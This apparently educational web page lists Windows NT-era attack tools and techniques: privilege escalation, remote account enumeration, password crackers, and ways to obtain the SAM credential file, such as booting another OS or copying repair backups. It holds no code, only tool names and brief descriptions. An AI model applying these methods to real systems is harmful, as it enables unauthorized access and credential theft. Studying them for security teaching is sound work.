Windows Exploits
- GetAdmin - tool that is used to escalate privileges on an Windows system
- CheckAdmin - see who is a member of the Administrator group in your LAN
- Red Button - remotely logs onto target machine without authentication using NetBIOS ports 137, 138, and 139
- Winfo - remotely retrieve a list of user accounts, workstation trust accounts, interdomain trust accounts, server trust accounts, and shares
- WinFingerPrint - enumerate OS, users, groups, SIDs, password policies, services, service packs and hotfixes, NetBIOS shares, transports, sessions, disks, security event log, and time of day utilizing NT Domain (Net*), Active Directory, or WMI APIs.
- Passwords
- L0phtcrack - free version uses dictionary; brute force version requires payment
- NTSweep - free version; tries changing passwords over the network
- NTCrack
- PWDump
- Advanced NT Security Explorer
- Obtaining passwords
- Sniffing the passwords off the network - Ethereal - free network protocol analyzer
- Booting into another OS (e.g. Linux or DOS) and copying the SAM file NTFSDOS or LINNT
- Using LINNT to obtain administrator access (Only works on a pre-sp3 computer WITHOUT syskey installed)
- Obtaining a copy of the SAM file from c:\winnt\repair or a backup directory
- Obtaining a copy from a tape or emergency repair disk
- Boot with another OS and change the passwords (Offline NT Password and Registry Editor)
- Scan ports - NetBrute Scanner; also scans for open shares
Please mail any comments about this page to summers_wayne@ColumbusState.edu